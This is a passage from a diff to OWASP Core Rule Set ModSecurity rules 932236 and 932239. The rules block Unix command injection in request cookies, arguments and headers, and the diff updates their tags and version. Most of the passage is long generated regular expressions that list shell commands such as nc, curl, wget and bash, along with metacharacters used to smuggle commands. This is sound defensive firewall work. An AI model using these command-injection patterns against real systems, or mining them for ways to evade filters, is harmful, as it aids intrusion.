)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z(?:[\s\x0b&\),<>\|]|$|[arx](?:[\s\x0b&\),<>\|]|$))|a(?:(?:b|w[ks]|l(?:ias|pine)|tobm|xel)(?:[\s\x0b&\),<>\|]|$)|pt(?:[\s\x0b&\),<>\|]|$|-get)|r(?:[\s\x0b&\),<>\|]|$|j(?:[\s\x0b&\),<>\|]|$|-register|disp)|(?:p|ch)(?:[\s\x0b&\),<>\|]|$)|ia2c)|s(?:h(?:[\s\x0b&\),<>\|]|$)|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible)|b(?:z(?:(?:z|c(?:at|mp))(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|idge(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$)))|c(?:[89]9(?:[\s\x0b&\),<>\|]|$|-gcc)|(?:a(?:t|ncel|psh)|c|mp)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|(?:an|io)(?:[\s\x0b&\),<>\|]|$)|ulimit)|s(?:(?:h|cli)(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:(?:t|rl)(?:[\s\x0b&\),<>\|]|$)|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:[\s\x0b&\),<>\|]|$|\+\+)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|r(?:ash(?:[\s\x0b&\),<>\|]|$)|ontab))|d(?:(?:[dfu]|i(?:(?:alo)?g|ff)|ash|vips)(?:[\s\x0b&\),<>\|]|$)|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:(?:b|qn|cho|fax|grep|macs|val)(?:[\s\x0b&\),<>\|]|$)|n(?:v(?:[\s\x0b&\),<>\|]|$|-update)|d(?:if|sw)(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|(?:h|ac)(?:[\s\x0b&\),<>\|]|$))|x(?:[\s\x0b&\),<>\|]|$|(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool)|2fsck|asy_install)|f(?:(?:c|mt|etch|lock|unction)(?:[\s\x0b&\),<>\|]|$)|d(?:[\s\x0b&\),<>\|]|$|(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|i(?:[\s\x0b&\),<>\|]|$|letest|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|tp(?:[\s\x0b&\),<>\|]|$|stats|who)|acter|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$))|g(?:c(?:c[^\s\x0b]{1,10}\b|ore(?:[\s\x0b&\),<>\|]|$))|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:m|tfacl)(?:[\s\x0b&\),<>\|]|$)|ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage))|hc(?:[\s\x0b&\),<>\|]|$|-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:c(?:[\s\x0b&\),<>\|]|$|at(?:[\s\x0b&\),<>\|]|$))|ep(?:[\s\x0b&\),<>\|]|$)|oup(?:[\s\x0b&\),<>\|]|$|mod))|tester|unzip)|h(?:(?:d|up|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:p(?:[\s\x0b&\),<>\|]|$|6?tables|config|p(?:eveprinter|find|tool))|(?:rb|conv)(?:[\s\x0b&\),<>\|]|$)|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|spell)|j(?:(?:js|q|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:(?:bs|in)(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:s(?:h(?:[\s\x0b&\),<>\|]|$)|shell)|ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$))|l(?:d(?:[\s\x0b&\),<>\|]|$|d(?:[\s\x0b&\),<>\|]|$)|config)|(?:[np]|inks|ynx)(?:[\s\x0b&\),<>\|]|$)|s(?:[\s\x0b&\),<>\|]|$|(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|ua(?:[\s\x0b&\),<>\|]|$|(?:la)?tex)|z(?:[\s\x0b&\),<>\|]|$|4(?:[\s\x0b&\),<>\|]|$|c(?:[\s\x0b&\),<>\|]|$|at))|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore))|a(?:st(?:[\s\x0b&\),<>\|]|$|comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|ess(?:[\s\x0b&\),<>\|]|$|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:ca(?:l|te)|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|il[qx]|ke|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|(?:tr|v|utt)(?:[\s\x0b&\),<>\|]|$)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:squitto|unt(?:[\s\x0b&\),<>\|]|$))|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:[\s\x0b&\),<>\|]|$|\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:t(?:[\s\x0b&\),<>\|]|$|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)(?:[\s\x0b&\),<>\|]|$)|m(?:[\s\x0b&\),<>\|]|$|ap(?:[\s\x0b&\),<>\|]|$))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:(?:d|ctave)(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:x|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:[\s\x0b&\),<>\|]|$|2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|f(?:[\s\x0b&\),<>\|]|$|tp(?:[\s\x0b&\),<>\|]|$))|i(?:c(?:[\s\x0b&\),<>\|]|$|o(?:[\s\x0b&\),<>\|]|$))|p[^\s\x0b]{1,10}\b|dstat|(?:gz|ng)(?:[\s\x0b&\),<>\|]|$))|k(?:g(?:[\s\x0b&\),<>\|]|$|_?info)|exec|ill(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|y(?:[\s\x0b&\),<>\|]|$)|int(?:env|f(?:[\s\x0b&\),<>\|]|$)))|t(?:x(?:[\s\x0b&\),<>\|]|$)|ar(?:[\s\x0b&\),<>\|]|$|diff|grep))|wd(?:[\s\x0b&\),<>\|]|$|\.db)|(?:xz|grep|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|s(?:(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:a(?:r|k[eu])|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|c(?:[\s\x0b&\),<>\|]|$|p(?:[\s\x0b&\),<>\|]|$))|e(?:d(?:[\s\x0b&\),<>\|]|$|carpet(?:[\s\x0b&\),<>\|]|$))|(?:v|boot|place)(?:[\s\x0b&\),<>\|]|$)|a(?:delf|lpath)|stic)|m(?:[\s\x0b&\),<>\|]|$|dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:[\s\x0b&\),<>\|]|$|db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n-(?:mailcap|parts)))|s(?:(?:c(?:p|hed|ript)|g|ash|diff|(?:ft|na)p|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:d|ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:[\s\x0b&\),<>\|]|$|arch|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:[\s\x0b&\),<>\|]|$|\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|sh(?:[\s\x0b&\),<>\|]|$|-key(?:ge|sca)n|pass)|u(?:[\s\x0b&\),<>\|]|$|do(?:[\s\x0b&\),<>_\|]|$|edit|replay))|vn(?:[\s\x0b&\),<>\|]|$|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:cat(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr](?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|skset)|(?:bl|o(?:p|uch)|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:p(?:[\s\x0b&\),<>\|]|$|dump|ing|traceroute)|l?sh(?:[\s\x0b&\),<>\|]|$))|e(?:[ex](?:[\s\x0b&\),<>\|]|$)|lnet)|i(?:c(?:[\s\x0b&\),<>\|]|$)|medatectl)|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:dp(?:[\s\x0b&\),<>\|]|$)|l(?:[\s\x0b&\),<>\|]|$|imit(?:[\s\x0b&\),<>\|]|$))|n(?:(?:compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|$|diff)|(?:gr|pw|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo)|algrind|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:(?:3m|c|atch|get)(?:[\s\x0b&\),<>\|]|$)|h(?:iptail(?:[\s\x0b&\),<>\|]|$)|oami)|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:(?:x|pa)d|args|term)(?:[\s\x0b&\),<>\|]|$)|z(?:[\s\x0b&\),<>\|]|$|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$)))|y(?:um|arn|elp)(?:[\s\x0b&\),<>\|]|$)|z(?:ip(?:[\s\x0b&\),<>\|]|$|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h(?:[\s\x0b&\),<>\|]|$)|oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|more|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|ypper))" \
     "id:932236,\
     phase:2,\
     block,\
@@ -1407,9 +1471,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1455,7 +1520,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932239
 #
-SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:t[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0